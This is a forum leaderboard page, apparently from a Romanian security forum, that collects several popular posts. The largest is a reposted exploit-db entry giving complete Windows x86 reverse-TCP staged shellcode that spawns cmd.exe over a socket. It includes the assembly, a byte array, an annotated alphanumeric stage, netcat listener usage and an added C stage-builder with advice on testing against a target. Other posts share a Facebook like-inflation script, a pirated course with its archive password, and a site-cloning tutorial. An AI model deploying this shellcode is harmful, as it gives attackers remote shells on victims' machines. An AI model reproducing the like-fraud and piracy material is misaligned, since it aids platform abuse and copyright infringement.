Leaderboard
Popular Content
Showing content with the highest reputation on 03/02/17 in all areas
-
3 points
-
I rewrote the code; it was one big file, now it looks more normal. I hope I can soon make the update I want to make. https://github.com/NytroRST/ShellcodeCompiler
2 points
-
########### Windows x86 Reverse TCP Staged Alphanumeric Shellcode CreateProcessA cmd.exe ########
########### Author: Snir Levi, Applitects #############
## 332 Bytes (first stage) ##
## For Educational Purposes Only ##
Date: 01.03.17
Author: Snir Levi
Email: snircontact@gmail.com
https://github.com/snir-levi/
IP - 127.0.0.1
PORT - 4444
Tested on: Windows 7, Windows 10

### Usage ###
The victim executes the first stage shellcode, which opens a TCP connection back to the listener. Once the connection is established, send the alphanumeric stage over that connection (paste it and press Enter):

nc -lvp 4444
connect to [127.0.0.1] from localhost [127.0.0.1] (port)
RPhoceshtePrhCreaTQPXLLLLLLLLYFFFFPXNNNNj0XHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHPhessAhProchExitTQPXFFFFFFFFPXZZZZZZZZZZj0YIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIITXQQQQWWWQQBRQQQQQQQQQQjDTZhexeChcmd.TYPRj0ZJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJRRRBRJRRQRAAAAAAANNNNS
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Users\>

########### ## Shellcode ## ###########

#### Second stage: alphanumeric shellcode ####

RPhoceshtePrhCreaTQPXLLLLLLLLYFFFFPXNNNNj0XHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHPhessAhProchExitTQPXFFFFFFFFPXZZZZZZZZZZj0YIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIITXQQQQWWWQQBRQQQQQQQQQQjDTZhexeChcmd.TYPRj0ZJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJRRRBRJRRQRAAAAAAANNNNS

Annotated. A suffix such as L*8 means the character repeated that many times; every "PX" pair is a placeholder that the first stage overwrites with a real two-byte opcode before calling the buffer.

R       push edx
P       push eax            ; eax = 0x00004173 ("sA\0\0"), set by the first stage
hoces   push 0x7365636f     ; "oces"
htePr   push 0x72506574     ; "tePr"
hCrea   push 0x61657243     ; "Crea"  -> "CreateProcessA\0" on the stack
T       push esp            ; name
Q       push ecx            ; ecx = kernel32 base, set by the first stage
PX      replaced with call [esi] (0x16ff)      ; GetProcAddress(kernel32, "CreateProcessA")
L*8     dec esp             ; move esp back to the pushed kernel32.dll address
Y       pop ecx             ; ecx = kernel32
F*4     inc esi             ; -> [esi+4]
PX      replaced with mov [esi],eax (0x0689)
N*4     dec esi             ; -> [esi]
j0      push 0x30
X       pop eax
H*48    dec eax             ; zero eax
P       push eax            ; null terminator
hessA   push 0x41737365     ; "essA" (the 'A' is null terminated by the first stage)
hProc   push 0x636f7250     ; "Proc"
hExit   push 0x74697845     ; "Exit"  -> "ExitProcess\0"
T       push esp
Q       push ecx
PX      replaced with call [esi] (0x16ff)      ; GetProcAddress(kernel32, "ExitProcess")
F*8     inc esi             ; -> [esi+8]
PX      replaced with mov [esi],eax (0x0689)
Z*10    pop edx             ; move the stack up to &PROCESS_INFORMATION
j0      push 0x30
Y       pop ecx
I*48    dec ecx             ; zero ecx
T       push esp
X       pop eax             ; eax = &PROCESS_INFORMATION
Q*4     push ecx            ; sub esp,16
W       push edi            ; hStdError  = socket
W       push edi            ; hStdOutput = socket
W       push edi            ; hStdInput  = socket
Q       push ecx
Q       push ecx
B       inc edx             ; edx = 0xff + 1 = 0x100 (STARTF_USESTDHANDLES)
R       push edx            ; dwFlags
Q*10    push ecx
jD      push 0x44           ; cb = sizeof(STARTUPINFOA)
T       push esp
Z       pop edx             ; edx = &STARTUPINFOA
hexeC   push 0x43657865     ; "exeC"
hcmd.   push 0x2e646d63     ; "cmd."  -> "cmd.exeC"
T       push esp            ; &'cmd.exe'
Y       pop ecx
P       push eax            ; &PROCESS_INFORMATION
R       push edx            ; &STARTUPINFOA
j0      push 0x30
Z       pop edx
J*48    dec edx             ; zero edx
R*3     push edx            ; lpCurrentDirectory, lpEnvironment, dwCreationFlags
B       inc edx
R       push edx            ; bInheritHandles = 1
J       dec edx
R*2     push edx            ; lpThreadAttributes, lpProcessAttributes
Q       push ecx            ; lpCommandLine = &'cmd.exe'
R       push edx            ; lpApplicationName = NULL
A*7     inc ecx             ; ecx -> the 'C' after 'cmd.exe', null terminated by the first stage
N*4     dec esi             ; -> [esi+4] = CreateProcessA
S       push ebx            ; return address (ebx was popped at the start of the buffer)

## First Stage Shellcode ##

global _start
section .text
_start:
    xor eax,eax
    push eax                    ; null terminator for CreateProcessA
    mov eax,[fs:eax+0x30]       ; Process Environment Block
    mov eax,[eax+0xc]           ; PEB->Ldr
    mov esi,[eax+0x14]          ; InMemoryOrderModuleList
    lodsd
    xchg esi,eax
    lodsd
    mov ebx,[eax+0x10]          ; kernel32 base
    mov ecx,[ebx+0x3c]          ; DOS->e_lfanew
    add ecx,ebx                 ; skip to PE header
    mov ecx,[ecx+0x78]          ; offset to export table
    add ecx,ebx                 ; kernel32 IMAGE_EXPORT_DIRECTORY
    mov esi,[ecx+0x20]          ; name table
    add esi,ebx
    xor edx,edx
getProcAddress:
    inc edx
    lodsd
    add eax,ebx
    cmp dword [eax],'GetP'
    jne getProcAddress
    cmp dword [eax+4],'rocA'
    jne getProcAddress
    ;---Function Addresses Chain----
    ;[esi]    GetProcAddress
    ;[esi+12] WSAStartup
    ;[esi+16] WSASocketA
    ;[esi+20] connect
    ;[esi+24] recv
    ;[esi+28] kernel32
    ;Alphanumeric stage stores:
    ;[esi+4]  CreateProcessA
    ;[esi+8]  ExitProcess
    mov esi,[ecx+0x1c]          ; function addresses table
    add esi,ebx
    mov edx,[esi+edx*4]
    add edx,ebx                 ; GetProcAddress
    sub esp,32                  ; buffer for the function addresses chain
    push esp
    pop esi
    mov [esp],edx               ; esi offset 0 -> GetProcAddress
    mov [esi+28],ebx            ; esi offset 28 -> kernel32
    ;--------LoadLibraryA Address--------------
    xor edi,edi
    push edi
    push 0x41797261             ; Ayra
    push 0x7262694c             ; rbiL
    push 0x64616f4c             ; daoL
    push esp
    push ebx
    call [esi]                  ; GetProcAddress(kernel32, "LoadLibraryA")
    ;-----ws2_32.dll Address-------
    xor ecx,ecx
    push ecx
    mov cx,0x3233               ; 0023
    push ecx
    push 0x5f327377             ; _2sw
    push esp
    call eax                    ; LoadLibraryA("ws2_32")
    mov ebp,eax                 ; ebp = ws2_32.dll
    ;-------WSAStartup Address-------------
    xor ecx,ecx
    push ecx
    mov cx,0x7075               ; 00up
    push ecx
    push 0x74726174             ; trat
    push 0x53415357             ; SASW
    push esp
    push ebp
    call [esi]
    mov [esi+12],eax            ; esi offset 12 -> WSAStartup
    ;-------WSASocketA Address-------------
    xor ecx,ecx
    push ecx
    mov cx,0x4174               ; 00At
    push ecx
    push 0x656b636f             ; ekco
    push 0x53415357             ; SASW
    push esp
    push ebp
    call [esi]
    mov [esi+16],eax            ; esi offset 16 -> WSASocketA
    ;------connect Address-----------
    push edi
    mov ecx,0x74636565          ; tcee
    shr ecx,8                   ; '\0tce' (no null byte in the instruction stream)
    push ecx
    push 0x6e6e6f63             ; nnoc
    push esp
    push ebp
    call [esi]
    mov [esi+20],eax            ; esi offset 20 -> connect
    ;------recv Address-------------
    push edi
    push 0x76636572             ; vcer
    push esp
    push ebp
    call [esi]
    mov [esi+24],eax            ; esi offset 24 -> recv
    ;------call WSAStartup()----------
    xor ecx,ecx
    sub sp,500                  ; room for WSADATA (the assembled bytes below encode 0x1f4 = 500)
    push esp                    ; lpWSAData
    mov cx,514                  ; MAKEWORD(2,2)
    push ecx
    call [esi+12]
    ;--------call WSASocketA()-----------
    ; WSASocketA(AF_INET = 2, SOCK_STREAM = 1, IPPROTO_TCP = 6, NULL, 0, 0)
    push eax                    ; if successful, eax = 0
    push eax
    push eax
    mov al,6
    push eax                    ; IPPROTO_TCP
    mov al,1
    push eax                    ; SOCK_STREAM
    inc eax
    push eax                    ; AF_INET
    call [esi+16]
    xchg eax,edi                ; edi = socket
    ;--------call connect----------
    ;struct sockaddr_in {
    ;    short sin_family;
    ;    u_short sin_port;
    ;    struct in_addr sin_addr;
    ;    char sin_zero[8];
    ;};
    push byte 0x1
    pop edx
    shl edx,24
    mov dl,0x7f                 ; edx = 0x0100007f = 127.0.0.1
    push edx
    push word 0x5c11            ; port 4444 (network byte order)
    push word 0x2               ; AF_INET
    ;int connect(SOCKET s, const struct sockaddr *name, int namelen);
    mov edx,esp
    push byte 16                ; sizeof(sockaddr)
    push edx                    ; (sockaddr*)
    push edi                    ; socket
    call [esi+20]
    ;--------call recv()----------
    ;int recv(SOCKET s, char *buf, int len, int flags);
stage:
    push eax                    ; flags = 0 (eax = 0 if connect succeeded)
    mov ax,950
    push eax                    ; buffer length
    push esp
    pop ebp
    sub ebp,eax                 ; buffer at [esp-950]
    push ebp                    ; &buf
    push edi                    ; socket
    call [esi+24]
executeStage:
    xor edx,edx
    mov byte [ebp+eax-1],0xc3   ; end of the alphanumeric buffer -> ret
    mov byte [ebp+96],dl        ; null terminator for ExitProcess
    mov byte [ebp-1],0x5b       ; buffer start: pop ebx -> return address
    dec ebp
    mov word [ebp+20],0x16ff    ; call dword [esi]
    mov word [ebp+35],0x0689    ; mov [esi],eax
    mov word [ebp+110],0x16ff   ; call dword [esi]
    mov word [ebp+120],0x0689   ; mov [esi],eax
    mov ax,0x4173               ; "sA" (end of "CreateProcessA")
    mov ecx,[esi+28]            ; ecx = kernel32
    dec dl                      ; edx = 0x000000ff
    call ebp                    ; execute the alphanumeric stage
executeShell:
    mov [ecx],dl                ; null terminator for 'cmd.exe'
    call dword [esi]            ; CreateProcessA (the stage left esi pointing at [esi+4])
    push eax
    call dword [esi+4]          ; ExitProcess

-----------------------

unsigned char shellcode[] =
    "\x31\xc0\x50\x64\x8b\x40\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad"
    "\x8b\x58\x10\x8b\x4b\x3c\x01\xd9\x8b\x49\x78\x01\xd9\x8b\x71\x20"
    "\x01\xde\x31\xd2\x42\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4"
    "\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x8b\x71\x1c\x01\xde\x8b\x14"
    "\x96\x01\xda\x83\xec\x20\x54\x5e\x89\x14\x24\x89\x5e\x1c\x31\xff"
    "\x57\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64"
    "\x54\x53\xff\x16\x31\xc9\x51\x66\xb9\x33\x32\x51\x68\x77\x73\x32"
    "\x5f\x54\xff\xd0\x89\xc5\x31\xc9\x51\x66\xb9\x75\x70\x51\x68\x74"
    "\x61\x72\x74\x68\x57\x53\x41\x53\x54\x55\xff\x16\x89\x46\x0c\x31"
    "\xc9\x51\x66\xb9\x74\x41\x51\x68\x6f\x63\x6b\x65\x68\x57\x53\x41"
    "\x53\x54\x55\xff\x16\x89\x46\x10\x57\xb9\x65\x65\x63\x74\xc1\xe9"
    "\x08\x51\x68\x63\x6f\x6e\x6e\x54\x55\xff\x16\x89\x46\x14\x57\x68"
    "\x72\x65\x63\x76\x54\x55\xff\x16\x89\x46\x18\x31\xc9\x66\x81\xec"
    "\xf4\x01\x54\x66\xb9\x02\x02\x51\xff\x56\x0c\x50\x50\x50\xb0\x06"
    "\x50\xb0\x01\x50\x40\x50\xff\x56\x10\x97\x6a\x01\x5a\xc1\xe2\x18"
    "\xb2\x7f\x52\x66\x68\x11\x5c\x66\x6a\x02\x89\xe2\x6a\x10\x52\x57"
    "\xff\x56\x14\x50\x66\xb8\xb6\x03\x50\x54\x5d\x29\xc5\x55\x57\xff"
    "\x56\x18\x31\xd2\xc6\x44\x05\xff\xc3\x88\x55\x60\xc6\x45\xff\x5b"
    "\x4d\x66\xc7\x45\x14\xff\x16\x66\xc7\x45\x23\x89\x06\x66\xc7\x45"
    "\x6e\xff\x16\x66\xc7\x45\x78\x89\x06\x66\xb8\x73\x41\x8b\x4e\x1c"
    "\xfe\xca\xff\xd5\x88\x11\xff\x16\x50\xff\x56\x04";

Source: https://www.exploit-db.com/exploits/41481/
2 points
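The way the first stage turns the received text into executable code, redone as an added example (my C, not part of the exploit-db post): it reproduces the byte patches the stager applies to the buffer (pop ebx in front, ret over the last received byte, the null over the 'A' of "essA", and the four "PX" placeholders that become call [esi] / mov [esi],eax) and checks that each one lands on the character the stage reserves for it. Two things it makes visible that the listing does not: the stage is alphanumeric except for the '.' in "cmd.", and because the ret overwrites the last received byte, the stage has to arrive with one extra trailing byte (the newline nc sends when you press Enter), otherwise the final 'S' (push ebx) is destroyed and the stage returns into whatever is on the stack. The second-stage string is the one posted above; nothing here executes shellcode, and the 'S'-survival rule is my reading of "mov byte [ebp+eax-1],0xc3", not a statement from the post.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define STAGE_LEN 296   /* length of the posted second stage, without the newline */

/* The second stage exactly as posted; the H, I and J runs are 48 long
   because "j0" loads 0x30 and 48 decrements bring the register to zero. */
static const char STAGE2[] =
    "RPhoceshtePrhCreaTQPXLLLLLLLLYFFFFPXNNNNj0X"
    "HHHHHHHHHHHH" "HHHHHHHHHHHH" "HHHHHHHHHHHH" "HHHHHHHHHHHH"
    "PhessAhProchExitTQPXFFFFFFFFPXZZZZZZZZZZj0Y"
    "IIIIIIIIIIII" "IIIIIIIIIIII" "IIIIIIIIIIII" "IIIIIIIIIIII"
    "TXQQQQWWWQQBRQQQQQQQQQQjDTZhexeChcmd.TYPRj0Z"
    "JJJJJJJJJJJJ" "JJJJJJJJJJJJ" "JJJJJJJJJJJJ" "JJJJJJJJJJJJ"
    "RRRBRJRRQRAAAAAAANNNNS";

/* Scratch image filled by build_posted_stage(); global so the patched
   bytes can be inspected afterwards. */
uint8_t stage_image[STAGE_LEN + 2];

/* Bytes of s outside [0-9A-Za-z]. The posted stage has exactly one: the '.' in "cmd.". */
int count_non_alnum(const char *s)
{
    int n = 0;
    for (; *s; s++) {
        int alnum = (*s >= '0' && *s <= '9') || (*s >= 'A' && *s <= 'Z') ||
                    (*s >= 'a' && *s <= 'z');
        n += !alnum;
    }
    return n;
}

/* Apply, in C, the edits the first stage makes after recv() wrote `received`
   bytes at buf (the stager's ebp):
     mov byte [ebp+eax-1],0xc3   ; last received byte -> ret
     mov byte [ebp+96],dl        ; 'A' of "essA" -> "ExitProcess\0"
     mov byte [ebp-1],0x5b       ; pop ebx in front of the stage
     dec ebp                     ; from here on offsets are relative to out
     mov word [ebp+20],0x16ff    ; "PX" -> call [esi]
     mov word [ebp+35],0x0689    ; "PX" -> mov [esi],eax
     mov word [ebp+110],0x16ff
     mov word [ebp+120],0x0689
   out receives the executable image, received + 1 bytes, and that length is
   returned. -1 means a patch would not land on the marker the stage reserves
   for it, or the ret would overwrite the final 'S' (push ebx), which is what
   happens when the stage is sent without a trailing byte. */
int build_stage(const uint8_t *buf, size_t received, uint8_t *out, size_t cap)
{
    static const struct { size_t off; uint8_t lo, hi; } patches[] = {
        { 20, 0xff, 0x16 },    /* call [esi]    */
        { 35, 0x89, 0x06 },    /* mov [esi],eax */
        { 110, 0xff, 0x16 },
        { 120, 0x89, 0x06 },
    };
    size_t i;

    if (received < STAGE_LEN + 1 || cap < received + 1)
        return -1;
    out[0] = 0x5b;                    /* pop ebx: return address into the stager */
    memcpy(out + 1, buf, received);   /* out + 1 is the old ebp, where recv() wrote */
    out[received] = 0xc3;             /* [ebp+eax-1] with the old ebp */
    if (out[1 + 96] != 'A')
        return -1;
    out[1 + 96] = 0;                  /* "ExitProcessA" -> "ExitProcess" */
    for (i = 0; i < sizeof patches / sizeof patches[0]; i++) {
        size_t off = patches[i].off;  /* relative to the decremented ebp, i.e. out */
        if (out[off] != 'P' || out[off + 1] != 'X')
            return -1;
        out[off] = patches[i].lo;
        out[off + 1] = patches[i].hi;
    }
    return (int)(received + 1);
}

/* Feed the posted stage through build_stage(), with or without the '\n'
   that nc appends when Enter is pressed. */
int build_posted_stage(int with_newline, uint8_t *out, size_t cap)
{
    uint8_t buf[STAGE_LEN + 1];
    memcpy(buf, STAGE2, STAGE_LEN);
    buf[STAGE_LEN] = '\n';
    return build_stage(buf, STAGE_LEN + (with_newline ? 1 : 0), out, cap);
}

int main(void)
{
    int n = build_posted_stage(1, stage_image, sizeof stage_image);
    printf("stage: %zu chars, %d non-alphanumeric, patched image %d bytes\n",
           strlen(STAGE2), count_non_alnum(STAGE2), n);
    printf("sent without a trailing newline: %d\n",
           build_posted_stage(0, stage_image, sizeof stage_image));
    return n < 0;
}
```

The offsets in the patch table are the ones in the stager's executeStage block; if you re-encode the stage (different register zeroing runs, a longer command line), rerun this before testing on a target, since a placeholder that has moved by one byte turns call [esi] into garbage in the middle of a push.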
-
Hi. OVH, Debian, Apache, PHP 7, MySQL, nothing special. Well, only the security side is hardcore; I configured it with ./nytro.sh --force
2 points
-
In case I did not post in the right category, I ask an admin to move it wherever they think is right. Do not use it abusively; anything over 900-1000 likes per day triggers like confirmation. Recommended: 400-500 likes per day. How do you use it? Make a file on your host, e.g. like.js, then call the file from JavaScript: </script><script type="text/javascript" src="http://www.site.com/like.js"></script> Go to developers.facebook.com and generate a like code for the page (choose the iframe variant), go to the admin > styles section and in the header file add the code from step 2, and under it add the link to the page where you want to receive the likes. Download link: PM for the password!
1 point
-
1 point
-
I spent a few hours looking for this course; all the torrents are dead: Pentester Academy Linux Assembly and Shellcoding Course | MEGA. The archive password is: nNFFWQgpmfvMHGr2EhET
1 point
-
I still have a GTX 960 2GB video card under warranty, complete in box. Photos: http://imgur.com/a/XOS6i Price: 650 RON
1 point
-
Better tell us details about what you use and how, so we know what advice to give you.
- Web platform: WordPress, Magento, forum, etc.
- Why you chose to go through Cloudflare
- A php.ini and the php-fpm pool config would help.
- my.cnf (the MySQL configuration file)
- Whether you use MySQL, Percona or MariaDB
- Which engine you use for the database tables
- What hardware resources the server has (SSD, HDD, memory, CPU)
- If you have an SSD, what percentage of its capacity is used
- Run httping against your site from another location and show us an average response time (ms)
- What score your site gets on PageSpeed Insights
- Whether or not you serve the content over HTTPS
1 point
-
There is certainly a huge opening on the international site... and competition, to be fair, but I focused on quality; I want everything to be as real, well detailed and safe as possible. I chose to do it for Romania first, to help those who have Romanian content. Even a few hundred views per video, if they come, are an effective boost, especially for those starting from 0. Then, if the content is good, everything follows on its own. After I optimize the application some more, I will launch the international site as well. I know how important views from the US and UK are :)... A video with an ad for something interesting and an affiliate link...
1 point
-
Hello. After some time I decided to make a tutorial on how we can copy a website down to the smallest details.
Step 1: We start by downloading the program needed to clone any website. HTTrack is a program developed by a French team and, luckily for us, it is distributed for free. Go to HTTrack.com, open the Downloads section and download the latest version.
Step 2: Find the site you want to clone. Since a few days ago I said in a YouTube video that I would clone a website belonging to cavaleria.ro (it is purely a demonstrative example), I will clone that one, so my target address will be Cavaleria.RO
Step 3: After downloading the program from the previous step, install it the classic way: "Next > I accept > Next > ... > Finish"
Step 4: Open the program; we are greeted by a start window. Click Next.
Step 5: Three fields appear: Project name, Project category, Base path
Project name - fill in any name; I used "clonarecavaleria"
Project category - fill in any name; I used "p_clonarecavaleria"
Base path - the place where you want the website clone to be saved
Step 6: Fill in the Web Addresses field with the web page you want to clone.
Step 7: Click Next, then Finish, and wait for the program to do its job (depending on the complexity of the site, cloning may take a while... of course, it also depends on the speed of your internet connection).
Step 8: After the site has been downloaded (when I chose the bluepanel, I stopped the cloning after 2-3 minutes because it was downloading every profile of every player, and it would have taken a good few hours).
Step 9: Go to C:\My Web Sites, or the location you specified in step 5, and open the folder named after your Project name.
Step 10: Open the cavaleria.ro folder (the folder named after the URL of the cloned site); we can open index.html and see that it (like all the other files) is identical to the one on the original site.
Notes and remarks:
This was a purely demonstrative tutorial.
This program cannot copy the site's PHP code (that is, the script part, the functionality of the site).
This program is very useful if you want to copy the look of a site; it copies it down to the smallest details.
The tutorial was made by me; it was also posted on my blog!
If you don't understand something, leave a comment and I will answer.
Thank you for your time!
1 point
This leaderboard is set to Bucharest/GMT+02:00